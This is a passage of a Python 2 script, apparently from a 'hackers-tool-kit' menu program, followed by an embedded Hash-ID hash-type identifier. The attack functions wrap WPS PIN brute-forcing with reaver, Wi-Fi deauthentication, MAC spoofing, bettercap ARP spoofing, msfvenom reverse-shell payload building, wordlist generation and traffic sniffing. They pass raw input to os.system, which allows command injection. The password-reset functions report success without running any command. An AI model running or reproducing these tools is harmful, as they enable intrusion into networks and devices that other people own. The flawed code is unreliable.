SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + 